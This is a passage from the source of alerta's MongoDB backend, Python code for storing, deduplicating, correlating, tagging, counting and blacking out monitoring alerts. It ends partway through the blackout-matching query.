/alerta/database/backends/mongodb/base.py
|
2a4c71408e53a806bed4989c3667dcd758b13753
|
[
"Apache-2.0"
] |
permissive
|
alerta/alerta
|
53eaf5e491da46a8faae37824eebd02e92b25dac
|
5b572c3aa9b086f02e366e3f8a2173174b0c5a87
|
refs/heads/master
| 2023-08-19T19:21:55.272638
| 2023-06-30T08:38:25
| 2023-06-30T08:38:25
| 3,877,327
| 1,468
| 282
|
Apache-2.0
| 2023-09-04T17:32:20
| 2012-03-30T14:19:34
|
Python
|
UTF-8
|
Python
| false
| false
| 71,239
|
py
|
base.py
|
from collections import defaultdict
from datetime import datetime, timedelta
from flask import current_app
from pymongo import ASCENDING, TEXT, MongoClient, ReturnDocument
from pymongo.errors import ConnectionFailure
from alerta.app import alarm_model
from alerta.database.base import Database
from alerta.exceptions import NoCustomerMatch
from alerta.models.enums import ADMIN_SCOPES
from alerta.models.heartbeat import HeartbeatStatus
from .utils import Query
# See https://github.com/MongoEngine/flask-mongoengine/blob/master/flask_mongoengine/__init__.py
# See https://github.com/dcrosta/flask-pymongo/blob/master/flask_pymongo/__init__.py
class Backend(Database):
def create_engine(self, app, uri, dbname=None, schema=None, raise_on_error=True):
self.uri = uri
self.dbname = dbname
db = self.connect()
try:
self._create_indexes(db)
except Exception as e:
if raise_on_error:
raise
app.logger.warning(e)
try:
self._update_lookups(db)
except Exception as e:
if raise_on_error:
raise
app.logger.warning(e)
def connect(self):
self.client = MongoClient(self.uri)
if self.dbname:
return self.client[self.dbname]
else:
return self.client.get_database()
@staticmethod
def _create_indexes(db):
db.alerts.create_index(
[('environment', ASCENDING), ('customer', ASCENDING), ('resource', ASCENDING), ('event', ASCENDING)],
unique=True
)
db.alerts.create_index([('$**', TEXT)])
db.customers.drop_indexes() # FIXME: should only drop customers index if it's unique (ie. the old one)
db.customers.create_index([('match', ASCENDING)])
db.heartbeats.create_index([('origin', ASCENDING), ('customer', ASCENDING)], unique=True)
db.keys.create_index([('key', ASCENDING)], unique=True)
db.perms.create_index([('match', ASCENDING)], unique=True)
db.users.drop_indexes()
db.users.create_index([('login', ASCENDING)], unique=True,
partialFilterExpression={'login': {'$type': 'string'}})
db.users.create_index([('email', ASCENDING)], unique=True,
partialFilterExpression={'email': {'$type': 'string'}})
db.groups.create_index([('name', ASCENDING)], unique=True)
db.metrics.create_index([('group', ASCENDING), ('name', ASCENDING)], unique=True)
@staticmethod
def _update_lookups(db):
for severity, code in alarm_model.Severity.items():
db.codes.update_one(
{'severity': severity},
{'$set': {'severity': severity, 'code': code}},
upsert=True
)
for status, state in alarm_model.Status.items():
db.states.update_one(
{'status': status},
{'$set': {'status': status, 'state': state}},
upsert=True
)
@property
def name(self):
return self.get_db().name
@property
def version(self):
return self.get_db().client.server_info()['version']
@property
def is_alive(self):
try:
self.get_db().client.admin.command('ismaster')
except ConnectionFailure:
return False
return True
def close(self, db):
self.client.close()
def destroy(self):
db = self.connect()
self.client.drop_database(db.name)
# ALERTS
def get_severity(self, alert):
"""
Get severity of correlated alert. Used to determine previous severity.
"""
query = {
'environment': alert.environment,
'resource': alert.resource,
'$or': [
{
'event': alert.event,
'severity': {'$ne': alert.severity}
},
{
'event': {'$ne': alert.event},
'correlate': alert.event
}],
'customer': alert.customer
}
r = self.get_db().alerts.find_one(query, projection={'severity': 1, '_id': 0})
return r['severity'] if r else None
def get_status(self, alert):
"""
Get status of correlated or duplicate alert. Used to determine previous status.
"""
query = {
'environment': alert.environment,
'resource': alert.resource,
'$or': [
{
'event': alert.event
},
{
'correlate': alert.event,
}
],
'customer': alert.customer
}
r = self.get_db().alerts.find_one(query, projection={'status': 1, '_id': 0})
return r['status'] if r else None
def is_duplicate(self, alert):
query = {
'environment': alert.environment,
'resource': alert.resource,
'event': alert.event,
'severity': alert.severity,
'customer': alert.customer
}
return self.get_db().alerts.find_one(query)
def is_correlated(self, alert):
query = {
'environment': alert.environment,
'resource': alert.resource,
'$or': [
{
'event': alert.event,
'severity': {'$ne': alert.severity}
},
{
'event': {'$ne': alert.event},
'correlate': alert.event
}],
'customer': alert.customer
}
return self.get_db().alerts.find_one(query)
def is_flapping(self, alert, window=1800, count=2):
"""
Return true if alert severity has changed more than X times in Y seconds
"""
pipeline = [
{'$match': {
'environment': alert.environment,
'resource': alert.resource,
'event': alert.event,
'customer': alert.customer
}},
{'$unwind': '$history'},
{'$match': {
'history.updateTime': {'$gt': datetime.utcnow() - timedelta(seconds=window)},
'history.type': 'severity'
}},
{'$group': {'_id': '$history.type', 'count': {'$sum': 1}}}
]
responses = self.get_db().alerts.aggregate(pipeline)
for r in responses:
if r['count'] > count:
return True
return False
def dedup_alert(self, alert, history):
"""
Update alert status, service, value, text, timeout and rawData, increment duplicate count and set
repeat=True, and keep track of last receive id and time but don't append to history unless status changes.
"""
query = {
'environment': alert.environment,
'resource': alert.resource,
'event': alert.event,
'severity': alert.severity,
'customer': alert.customer
}
now = datetime.utcnow()
update = {
'$set': {
'status': alert.status,
'service': alert.service,
'value': alert.value,
'text': alert.text,
'timeout': alert.timeout,
'rawData': alert.raw_data,
'repeat': True,
'lastReceiveId': alert.id,
'lastReceiveTime': now
},
'$addToSet': {'tags': {'$each': alert.tags}},
'$inc': {'duplicateCount': 1}
}
# only update those attributes that are specifically defined
attributes = {'attributes.' + k: v for k, v in alert.attributes.items()}
update['$set'].update(attributes)
if alert.update_time:
update['$set']['updateTime'] = alert.update_time
if history:
update['$push'] = {
'history': {
'$each': [history.serialize],
'$slice': current_app.config['HISTORY_LIMIT'],
'$position': 0
}
}
return self.get_db().alerts.find_one_and_update(
query,
update=update,
return_document=ReturnDocument.AFTER
)
def correlate_alert(self, alert, history):
"""
Update alert key attributes, reset duplicate count and set repeat=False, keep track of last
receive id and time, appending all to history. Append to history again if status changes.
"""
query = {
'environment': alert.environment,
'resource': alert.resource,
'$or': [
{
'event': alert.event,
'severity': {'$ne': alert.severity}
},
{
'event': {'$ne': alert.event},
'correlate': alert.event
}],
'customer': alert.customer
}
update = {
'$set': {
'event': alert.event,
'severity': alert.severity,
'status': alert.status,
'service': alert.service,
'value': alert.value,
'text': alert.text,
'createTime': alert.create_time,
'timeout': alert.timeout,
'rawData': alert.raw_data,
'duplicateCount': alert.duplicate_count,
'repeat': alert.repeat,
'previousSeverity': alert.previous_severity,
'trendIndication': alert.trend_indication,
'receiveTime': alert.receive_time,
'lastReceiveId': alert.last_receive_id,
'lastReceiveTime': alert.last_receive_time
},
'$addToSet': {'tags': {'$each': alert.tags}},
'$push': {
'history': {
'$each': [h.serialize for h in history],
'$slice': current_app.config['HISTORY_LIMIT'],
'$position': 0
}
}
}
# only update those attributes that are specifically defined
attributes = {'attributes.' + k: v for k, v in alert.attributes.items()}
update['$set'].update(attributes)
if alert.update_time:
update['$set']['updateTime'] = alert.update_time
return self.get_db().alerts.find_one_and_update(
query,
update=update,
return_document=ReturnDocument.AFTER
)
def create_alert(self, alert):
data = {
'_id': alert.id,
'resource': alert.resource,
'event': alert.event,
'environment': alert.environment,
'severity': alert.severity,
'correlate': alert.correlate,
'status': alert.status,
'service': alert.service,
'group': alert.group,
'value': alert.value,
'text': alert.text,
'tags': alert.tags,
'attributes': alert.attributes,
'origin': alert.origin,
'type': alert.event_type,
'createTime': alert.create_time,
'timeout': alert.timeout,
'rawData': alert.raw_data,
'customer': alert.customer,
'duplicateCount': alert.duplicate_count,
'repeat': alert.repeat,
'previousSeverity': alert.previous_severity,
'trendIndication': alert.trend_indication,
'receiveTime': alert.receive_time,
'lastReceiveId': alert.last_receive_id,
'lastReceiveTime': alert.last_receive_time,
'updateTime': alert.update_time,
'history': [h.serialize for h in alert.history]
}
if self.get_db().alerts.insert_one(data).inserted_id == alert.id:
return data
def set_alert(self, id, severity, status, tags, attributes, timeout, previous_severity, update_time, history=None):
query = {'_id': {'$regex': '^' + id}}
update = {
'$set': {
'severity': severity,
'status': status,
'attributes': attributes,
'timeout': timeout,
'previousSeverity': previous_severity,
'updateTime': update_time
},
'$addToSet': {'tags': {'$each': tags}},
'$push': {
'history': {
'$each': [h.serialize for h in history],
'$slice': current_app.config['HISTORY_LIMIT'],
'$position': 0
}
}
}
return self.get_db().alerts.find_one_and_update(
query,
update=update,
return_document=ReturnDocument.AFTER
)
def get_alert(self, id, customers=None):
if len(id) == 8:
query = {'$or': [{'_id': {'$regex': '^' + id}}, {'lastReceiveId': {'$regex': '^' + id}}]}
else:
query = {'$or': [{'_id': id}, {'lastReceiveId': id}]}
if customers:
query['customer'] = {'$in': customers}
return self.get_db().alerts.find_one(query)
# STATUS, TAGS, ATTRIBUTES
def set_status(self, id, status, timeout, update_time, history=None):
"""
Set status and update history.
"""
query = {'_id': {'$regex': '^' + id}}
update = {
'$set': {'status': status, 'timeout': timeout, 'updateTime': update_time},
'$push': {
'history': {
'$each': [history.serialize],
'$slice': current_app.config['HISTORY_LIMIT'],
'$position': 0
}
}
}
return self.get_db().alerts.find_one_and_update(
query,
update=update,
return_document=ReturnDocument.AFTER
)
def tag_alert(self, id, tags):
"""
Append tags to tag list. Don't add same tag more than once.
"""
response = self.get_db().alerts.update_one(
{'_id': {'$regex': '^' + id}}, {'$addToSet': {'tags': {'$each': tags}}})
return response.matched_count > 0
def untag_alert(self, id, tags):
"""
Remove tags from tag list.
"""
response = self.get_db().alerts.update_one({'_id': {'$regex': '^' + id}}, {'$pullAll': {'tags': tags}})
return response.matched_count > 0
def update_tags(self, id, tags):
response = self.get_db().alerts.update_one({'_id': {'$regex': '^' + id}}, update={'$set': {'tags': tags}})
return response.matched_count > 0
def update_attributes(self, id, old_attrs, new_attrs):
update = dict()
set_value = {'attributes.' + k: v for k, v in new_attrs.items() if v is not None}
if set_value:
update['$set'] = set_value
unset_value = {'attributes.' + k: v for k, v in new_attrs.items() if v is None}
if unset_value:
update['$unset'] = unset_value
if update:
return self.get_db().alerts.find_one_and_update(
{'_id': {'$regex': '^' + id}},
update=update,
return_document=ReturnDocument.AFTER
)['attributes']
return {}
def delete_alert(self, id):
response = self.get_db().alerts.delete_one({'_id': {'$regex': '^' + id}})
return True if response.deleted_count == 1 else False
# BULK
def tag_alerts(self, query=None, tags=None):
query = query or Query()
updated = list(self.get_db().alerts.find(query.where, projection={'_id': 1}))
response = self.get_db().alerts.update(query.where, {'$addToSet': {'tags': {'$each': tags}}})
return updated if response['n'] else []
def untag_alerts(self, query=None, tags=None):
query = query or Query()
updated = list(self.get_db().alerts.find(query.where, projection={'_id': 1}))
response = self.get_db().alerts.update(query.where, {'$pullAll': {'tags': tags}})
return updated if response['n'] else []
def update_attributes_by_query(self, query=None, attributes=None):
query = query or Query()
update = dict()
set_value = {'attributes.' + k: v for k, v in attributes.items() if v is not None}
if set_value:
update['$set'] = set_value
unset_value = {'attributes.' + k: v for k, v in attributes.items() if v is None}
if unset_value:
update['$unset'] = unset_value
updated = list(self.get_db().alerts.find(query.where, projection={'_id': 1}))
response = self.get_db().alerts.update_many(query.where, update=update)
return updated if response.matched_count > 0 else []
def delete_alerts(self, query=None):
query = query or Query()
deleted = list(self.get_db().alerts.find(query.where, projection={'_id': 1}))
response = self.get_db().alerts.remove(query.where)
return deleted if response['n'] else []
# SEARCH & HISTORY
def add_history(self, id, history):
query = {'_id': {'$regex': '^' + id}}
update = {
'$push': {
'history': {
'$each': [history.serialize],
'$slice': current_app.config['HISTORY_LIMIT'],
'$position': 0
}
}
}
return self.get_db().alerts.find_one_and_update(
query,
update=update,
return_document=ReturnDocument.AFTER
)
def get_alerts(self, query=None, raw_data=False, history=False, page=None, page_size=None):
query = query or Query()
fields = dict()
if not raw_data:
fields['rawData'] = 0
if not history:
fields['history'] = 0
pipeline = [
{'$lookup': {
'from': 'codes',
'localField': 'severity',
'foreignField': 'severity',
'as': 'fromCodes'
}},
{'$replaceRoot': {'newRoot': {'$mergeObjects': [{'$arrayElemAt': ['$fromCodes', 0]}, '$$ROOT']}}},
{'$project': {'fromCodes': 0}},
{'$lookup': {
'from': 'states',
'localField': 'status',
'foreignField': 'status',
'as': 'fromStates'
}},
{'$replaceRoot': {'newRoot': {'$mergeObjects': [{'$arrayElemAt': ['$fromStates', 0]}, '$$ROOT']}}},
{'$project': {'fromStates': 0}},
{'$match': query.where},
{'$project': fields},
{'$sort': {k: v for k, v in query.sort}},
{'$skip': (page - 1) * page_size},
{'$limit': page_size}
]
return self.get_db().alerts.aggregate(pipeline)
def get_alert_history(self, alert, page=None, page_size=None):
query = {
'environment': alert.environment,
'resource': alert.resource,
'$or': [
{
'event': alert.event
},
{
'correlate': alert.event,
}
],
'customer': alert.customer
}
fields = {
'resource': 1,
'event': 1,
'environment': 1,
'customer': 1,
'service': 1,
'group': 1,
'tags': 1,
'attributes': 1,
'origin': 1,
'type': 1,
'history': 1
}
pipeline = [
{'$unwind': '$history'},
{'$match': query},
{'$project': fields},
{'$sort': {'history.updateTime': -1}},
{'$skip': (page - 1) * page_size},
{'$limit': page_size},
]
responses = self.get_db().alerts.aggregate(pipeline)
history = list()
for response in responses:
history.append(
{
'id': response['history']['id'],
'resource': response['resource'],
'event': response['history'].get('event'),
'environment': response['environment'],
'severity': response['history'].get('severity'),
'service': response['service'],
'status': response['history'].get('status'),
'group': response['group'],
'value': response['history'].get('value'),
'text': response['history'].get('text'),
'tags': response['tags'],
'attributes': response['attributes'],
'origin': response['origin'],
'updateTime': response['history']['updateTime'],
'user': response['history'].get('user'),
'timeout': response['history'].get('timeout'),
'type': response['history'].get('type', 'unknown'),
'customer': response.get('customer')
}
)
return history
def get_history(self, query=None, page=None, page_size=None):
query = query or Query()
fields = {
'resource': 1,
'event': 1,
'environment': 1,
'customer': 1,
'service': 1,
'group': 1,
'tags': 1,
'attributes': 1,
'origin': 1,
'user': 1,
'timeout': 1,
'type': 1,
'history': 1
}
pipeline = [
{'$unwind': '$history'},
{'$match': query.where},
{'$project': fields},
{'$sort': {'history.updateTime': -1}},
{'$skip': (page - 1) * page_size},
{'$limit': page_size},
]
responses = self.get_db().alerts.aggregate(pipeline)
history = list()
for response in responses:
history.append(
{
'id': response['history']['id'],
'resource': response['resource'],
'event': response['history']['event'],
'environment': response['environment'],
'severity': response['history']['severity'],
'service': response['service'],
'status': response['history']['status'],
'group': response['group'],
'value': response['history']['value'],
'text': response['history']['text'],
'tags': response['tags'],
'attributes': response['attributes'],
'origin': response['origin'],
'updateTime': response['history']['updateTime'],
'user': response.get('user'),
'timeout': response.get('timeout'),
'type': response['history'].get('type', 'unknown'),
'customer': response.get('customer', None)
}
)
return history
# COUNTS
def get_count(self, query=None):
"""
Return total number of alerts that meet the query filter.
"""
query = query or Query()
return self.get_db().alerts.count_documents(query.where)
def get_counts(self, query=None, group=None):
query = query or Query()
if group is None:
raise ValueError('Must define a group')
pipeline = [
{'$match': query.where},
{'$project': {group: 1}},
{'$group': {'_id': '$' + group, 'count': {'$sum': 1}}}
]
responses = self.get_db().alerts.aggregate(pipeline)
counts = dict()
for response in responses:
counts[response['_id']] = response['count']
return counts
def get_counts_by_severity(self, query=None):
query = query or Query()
return self.get_counts(query, group='severity')
def get_counts_by_status(self, query=None):
query = query or Query()
return self.get_counts(query, group='status')
def get_topn_count(self, query=None, group='event', topn=100):
query = query or Query()
pipeline = [
{'$match': query.where},
{'$unwind': '$service'},
{
'$group': {
'_id': f'${group}',
'count': {'$sum': 1},
'duplicateCount': {'$sum': '$duplicateCount'},
'environments': {'$addToSet': '$environment'},
'services': {'$addToSet': '$service'},
'resources': {'$addToSet': {'id': '$_id', 'resource': '$resource'}}
}
},
{'$sort': {'count': -1, 'duplicateCount': -1}},
{'$limit': topn}
]
responses = self.get_db().alerts.aggregate(pipeline, allowDiskUse=True)
top = list()
for response in responses:
top.append(
{
f'{group}': response['_id'],
'environments': response['environments'],
'services': response['services'],
'resources': response['resources'],
'count': response['count'],
'duplicateCount': response['duplicateCount']
}
)
return top
def get_topn_flapping(self, query=None, group='event', topn=100):
query = query or Query()
pipeline = [
{'$match': query.where},
{'$unwind': '$service'},
{'$unwind': '$history'},
{'$match': {'history.type': 'severity'}},
{
'$group': {
'_id': f'${group}',
'count': {'$sum': 1},
'duplicateCount': {'$max': '$duplicateCount'},
'environments': {'$addToSet': '$environment'},
'services': {'$addToSet': '$service'},
'resources': {'$addToSet': {'id': '$_id', 'resource': '$resource'}}
}
},
{'$sort': {'count': -1, 'duplicateCount': -1}},
{'$limit': topn}
]
responses = self.get_db().alerts.aggregate(pipeline, allowDiskUse=True)
top = list()
for response in responses:
top.append(
{
f'{group}': response['_id'],
'environments': response['environments'],
'services': response['services'],
'resources': response['resources'],
'count': response['count'],
'duplicateCount': response['duplicateCount']
}
)
return top
def get_topn_standing(self, query=None, group='event', topn=100):
query = query or Query()
pipeline = [
{'$match': query.where},
{'$unwind': '$service'},
{
'$group': {
'_id': f'${group}',
'count': {'$sum': 1},
'duplicateCount': {'$sum': '$duplicateCount'},
'lifeTime': {'$sum': {'$subtract': ['$lastReceiveTime', '$createTime']}},
'environments': {'$addToSet': '$environment'},
'services': {'$addToSet': '$service'},
'resources': {'$addToSet': {'id': '$_id', 'resource': '$resource'}}
}
},
{'$sort': {'lifeTime': -1, 'duplicateCount': -1}},
{'$limit': topn}
]
responses = self.get_db().alerts.aggregate(pipeline, allowDiskUse=True)
top = list()
for response in responses:
top.append(
{
f'{group}': response['_id'],
'environments': response['environments'],
'services': response['services'],
'resources': response['resources'],
'count': response['count'],
'duplicateCount': response['duplicateCount']
}
)
return top
# ENVIRONMENTS
def get_environments(self, query=None, topn=1000):
query = query or Query()
def pipeline(group_by):
return [
{'$match': query.where},
{'$project': {'environment': 1, group_by: 1}},
{'$group':
{
'_id': {'environment': '$environment', group_by: '$' + group_by},
'count': {'$sum': 1}
}
},
{'$limit': topn}
]
response_severity = self.get_db().alerts.aggregate(pipeline('severity'))
severity_count = defaultdict(list)
for r in response_severity:
severity_count[r['_id']['environment']].append((r['_id']['severity'], r['count']))
response_status = self.get_db().alerts.aggregate(pipeline('status'))
status_count = defaultdict(list)
for r in response_status:
status_count[r['_id']['environment']].append((r['_id']['status'], r['count']))
environments = self.get_db().alerts.find().distinct('environment')
return [
{
'environment': env,
'severityCounts': dict(severity_count[env]),
'statusCounts': dict(status_count[env]),
'count': sum(t[1] for t in severity_count[env])
} for env in environments]
# SERVICES
def get_services(self, query=None, topn=1000):
query = query or Query()
def pipeline(group_by):
return [
{'$unwind': '$service'},
{'$match': query.where},
{'$project': {'environment': 1, 'service': 1, group_by: 1}},
{'$group':
{
'_id': {'environment': '$environment', 'service': '$service', group_by: '$' + group_by},
'count': {'$sum': 1}
}
},
{'$limit': topn}
]
response_severity = self.get_db().alerts.aggregate(pipeline('severity'))
severity_count = defaultdict(list)
for r in response_severity:
severity_count[(r['_id']['environment'], r['_id']['service'])].append((r['_id']['severity'], r['count']))
response_status = self.get_db().alerts.aggregate(pipeline('status'))
status_count = defaultdict(list)
for r in response_status:
status_count[(r['_id']['environment'], r['_id']['service'])].append((r['_id']['status'], r['count']))
pipeline = [
{'$unwind': '$service'},
{'$group': {'_id': {'environment': '$environment', 'service': '$service'}}},
{'$limit': topn}
]
services = list(self.get_db().alerts.aggregate(pipeline))
return [
{
'environment': svc['_id']['environment'],
'service': svc['_id']['service'],
'severityCounts': dict(severity_count[(svc['_id']['environment'], svc['_id']['service'])]),
'statusCounts': dict(status_count[(svc['_id']['environment'], svc['_id']['service'])]),
'count': sum(t[1] for t in severity_count[(svc['_id']['environment'], svc['_id']['service'])])
} for svc in services]
# ALERT GROUPS
def get_alert_groups(self, query=None, topn=1000):
query = query or Query()
pipeline = [
{'$match': query.where},
{'$project': {'environment': 1, 'group': 1}},
{'$limit': topn},
{'$group': {'_id': {'environment': '$environment', 'group': '$group'}, 'count': {'$sum': 1}}}
]
responses = self.get_db().alerts.aggregate(pipeline)
groups = list()
for response in responses:
groups.append(
{
'environment': response['_id']['environment'],
'group': response['_id']['group'],
'count': response['count']
}
)
return groups
# ALERT TAGS
def get_alert_tags(self, query=None, topn=1000):
query = query or Query()
pipeline = [
{'$match': query.where},
{'$unwind': '$tags'},
{'$project': {'environment': 1, 'tags': 1}},
{'$limit': topn},
{'$group': {'_id': {'environment': '$environment', 'tag': '$tags'}, 'count': {'$sum': 1}}}
]
responses = self.get_db().alerts.aggregate(pipeline)
tags = list()
for response in responses:
tags.append(
{
'environment': response['_id']['environment'],
'tag': response['_id']['tag'],
'count': response['count']
}
)
return tags
# BLACKOUTS
def create_blackout(self, blackout):
data = {
'_id': blackout.id,
'priority': blackout.priority,
'environment': blackout.environment,
'startTime': blackout.start_time,
'endTime': blackout.end_time,
'duration': blackout.duration,
'user': blackout.user,
'createTime': blackout.create_time,
'text': blackout.text,
}
if blackout.service:
data['service'] = blackout.service
if blackout.resource:
data['resource'] = blackout.resource
if blackout.event:
data['event'] = blackout.event
if blackout.group:
data['group'] = blackout.group
if blackout.tags:
data['tags'] = blackout.tags
if blackout.origin:
data['origin'] = blackout.origin
if blackout.customer:
data['customer'] = blackout.customer
if self.get_db().blackouts.insert_one(data).inserted_id == blackout.id:
return data
def get_blackout(self, id, customers=None):
query = {'_id': id}
if customers:
query['customer'] = {'$in': customers}
return self.get_db().blackouts.find_one(query)
def get_blackouts(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().blackouts.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_blackouts_count(self, query=None):
query = query or Query()
return self.get_db().blackouts.count_documents(query.where)
def is_blackout_period(self, alert):
query = dict()
query['startTime'] = {'$lte': alert.create_time}
query['endTime'] = {'$gt': alert.create_time}
query['environment'] = alert.environment
query['$and'] = [{'$or': [
{'resource': None, 'service': None, 'event': None, 'group': None, 'tags': None, 'origin': None},
{'resource': None, 'service': None, 'event': None, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': None, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': None, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': None, 'service': None, 'event': None, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': None, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': alert.event, 'group': None, 'tags': None, 'origin': None},
{'resource': None, 'service': None, 'event': alert.event, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': None, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': None, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': None, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': None, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': None, 'group': None, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': None, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': None, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': None, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': None, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': None, 'origin': None},
